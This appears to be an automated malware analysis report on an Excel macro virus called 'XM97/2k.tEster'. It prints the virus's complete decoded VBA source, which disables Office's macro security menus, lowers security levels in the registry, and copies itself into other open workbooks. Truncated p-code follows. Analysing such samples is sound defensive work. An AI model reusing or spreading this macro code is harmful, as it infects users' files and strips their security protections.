Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 55462b91e19332d3…

MALICIOUS

Office (OLE)

18.5 KB Created: 2001-07-06 17:23:47 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 7db49bd88d4141c57b0210c28c2f005c SHA-1: f1f809b769c123da43094a2dd7ea85a0739521b6 SHA-256: 55462b91e19332d3ca6c2abde0f52957bab9f67c2431ec489382219af46af59e
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an Excel file containing VBA macros. The script attempts to modify Excel security settings by writing to the registry keys HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6 and HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level. It then attempts to save the workbook, potentially to execute a payload or establish persistence. The ClamAV detection 'Xls.Trojan.Tester-3' further supports its malicious nature.

Heuristics 1

  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5944 bytes
SHA-256: 9418001078baf582ace9987c320032853c5b880e9dafdee710fbc719192de9ed
Detection
ClamAV: Xls.Trojan.Tester-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Tento_sešit"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'XM97/2k.tEster

Sub Workbook_Deactivate()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
CommandBars("Tools").Controls("Macro").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = 0&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("Tento_sešit").CodeModule        'cz
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule       'us
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule  'de
Set ThisBook = ThisWorkbook.VBProject.VBComponents("Tento_sešit").CodeModule            'cz
Set ThisBook = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule           'us
Set ThisBook = ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule      'de
vxCopy = ThisBook.Lines(1, ThisBook.countoflines)
If ActiveBook.Lines(1, 1) <> "'XM97/2k.tEster" Then
 ActiveBook.deletelines 1, ActiveBook.countoflines
 ActiveBook.insertlines 1, vxCopy
 If ActiveWorkbook.Path = "" Then
  ActiveWorkbook.SaveAs ActiveWorkbook.FullName
 Else
  ActiveWorkbook.Save
 End If
End If
'XM97/2k.tEster by gl_st0rm of [mions]
End Sub

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/d689602d65f2471f966bba7c893ec1a5.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Tento_sešit - 3550 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000E "XM97/2k.tEster"
' Line #1:
' Line #2:
' 	FuncDefn (Sub deletelines())
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	LitVarSpecial (False)
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
' 	ArgsLd Controls 0x0001 
' 	ArgsMemLd Enabled 0x0001 
' 	MemSt System 
' Line #5:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd Controls 0x0001 
' 	ArgsMemLd Enabled 0x0001 
' 	MemSt System 
' Line #6:
' 	LitDI4 0x0000 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x0045 "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"
' 	LitStr 0x0008 "Options6"
' 	Ld PrivateProfileString 
' 	ArgsMemSt book 0x0003 
' Line #7:
' 	LitDI4 0x0001 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security"
' 	LitStr 0x0005 "Level"
' 	Ld PrivateProfileString 
' 	ArgsMemSt book 0x0003 
' Line #8:
' 	SetStmt 
' 	LitStr 0x000B "Tento_sešit"
' 	Ld VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd CodeModule 0x0001 
' 	MemLd Item 
' 	Set _B_var_ActiveBook 
' 	QuoteRem 0x0058 0x0002 "cz"
' Line #9:
' 	SetStmt 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd CodeModule 0x0001 
' 	MemLd Item 
' 	Set _B_var_ActiveBook 
' 	QuoteRem 0x0058 0x0002 "us"
' 
... (truncated)